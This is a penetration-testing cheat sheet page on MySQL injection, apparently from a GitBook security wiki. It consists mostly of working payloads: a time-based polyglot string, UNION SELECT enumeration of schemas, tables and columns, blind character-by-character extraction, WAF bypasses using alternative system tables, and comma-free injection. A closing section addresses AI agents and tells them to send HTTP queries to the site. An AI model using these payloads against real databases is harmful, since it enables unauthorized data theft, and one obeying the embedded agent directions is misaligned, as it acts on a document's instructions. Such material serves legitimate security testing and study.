# MySQL injection

**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)**​**

```
 Comment for MySQL version 3.23.02
```

## Interesting Functions <a href="#interesting-functions" id="interesting-functions"></a>

### Confirm Mysql: <a href="#confirm-mysql" id="confirm-mysql"></a>

```
concat('a','b')database()version()user()system_user()@@version@@datadirrand()floor(2.9)length(1)count(1)
```

### Useful functions <a href="#useful-functions" id="useful-functions"></a>

```
SELECT hex(database())SELECT conv(hex(database()),16,10) SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')SELECT uncompress(compress(database())) SELECT replace(database(),"r","R")SELECT substr(database(),1,1)='r'SELECT substring(database(),1,1)=0x72SELECT ascii(substring(database(),1,1))=114SELECT database()=char(114,101,120,116,101,115,116,101,114)SELECT group_concat(<COLUMN>) FROM <TABLE>SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
```

## All injection <a href="#all-injection" id="all-injection"></a>

```
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
```

from <https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/>​

## Flow <a href="#flow" id="flow"></a>

Remember that in "modern" versions of **MySQL** you can substitute "***information\_schema.tables***" for "***mysql.innodb\_table\_stats*****"** (This could be useful to bypass WAFs).

```
SELECT table_name FROM information_schema.tables WHERE table_schema=database();SELECT column_name FROM information_schema.columns WHERE table_name=""; SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; SELECT user FROM mysql.user WHERE file_priv='Y'; 
```

### **Only 1 value** <a href="#only-1-value" id="only-1-value"></a>

* `group_concat()`
* `Limit X,1`

### **Blind one by one** <a href="#blind-one-by-one" id="blind-one-by-one"></a>

* `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
* `mid(version(),X,1)='5'`

### **Blind adding** <a href="#blind-adding" id="blind-adding"></a>

* `LPAD(version(),1...lenght(version()),'1')='asd'...`
* `RPAD(version(),1...lenght(version()),'1')='asd'...`
* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
* `SELECT INSTR('foobarbar', 'fo...')=1`

## Detect number of columns  <a href="#detect-number-of-columns" id="detect-number-of-columns"></a>

Using a simple ORDER

```
order by 1order by 2order by 3...order by XXX​UniOn SeLect 1UniOn SeLect 1,2UniOn SeLect 1,2,3...
```

## MySQL Union Based <a href="#mysql-union-based" id="mysql-union-based"></a>

```
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemataUniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```

## SSRF <a href="#ssrf" id="ssrf"></a>

**Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](/pwc/ji-shu/webpentest2/untitled-25/mysql-injection/mysql-ssrf.md)**.**

## WAF bypass tricks <a href="#waf-bypass-tricks" id="waf-bypass-tricks"></a>

### Information\_schema alternatives <a href="#information_schema-alternatives" id="information_schema-alternatives"></a>

Remember that in "modern" versions of **MySQL** you can substitute ***information\_schema.tables*** for ***mysql.innodb\_table\_stats*** or for ***sys.x$schema\_flattened\_keys*** or for **sys.schema\_table\_statistics**

![](https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LyK4C4fKm2GhzhbiS2W%2F-LyKAQVofzVVYQjgkfGf%2Fimage.png?alt=media\&token=66ee8b2a-3c70-4a74-bf87-3facfb06b729)

![](https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LyK4C4fKm2GhzhbiS2W%2F-LyKAtbOe4NGH5ogtT3t%2Fimage.png?alt=media\&token=014daec7-2fe8-48e8-ab48-3755421fefdd)

### MySQLinjection without COMMAS <a href="#mysqlinjection-without-commas" id="mysqlinjection-without-commas"></a>

Select 2 columns without using any comma (<https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma>):

```
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
```

### Retrieving values without the column name <a href="#retrieving-values-without-the-column-name" id="retrieving-values-without-the-column-name"></a>

If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:

```
select (select "", "") = (SELECT * from demo limit 1);     select (select "", "", "") < (SELECT * from demo limit 1); 
```

Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:

```
select (select 1, 'flaf') = (SELECT * from demo limit 1);
```

More info in <https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952>​

### MySQL history <a href="#mysql-history" id="mysql-history"></a>

You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis**

### Version alternative**s** <a href="#version-alternatives" id="version-alternatives"></a>

```
mysql> select @@innodb_version;+------------------+| @@innodb_version |+------------------+| 5.6.31           |+------------------+​mysql> select @@version;+-------------------------+| @@version               |+-------------------------+| 5.6.31-0ubuntu0.15.10.1 |+-------------------------+​mysql> mysql> select version();+-------------------------+| version()               |+-------------------------+| 5.6.31-0ubuntu0.15.10.1 |+-------------------------+
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pwc-3.gitbook.io/pwc/ji-shu/webpentest2/untitled-25/mysql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.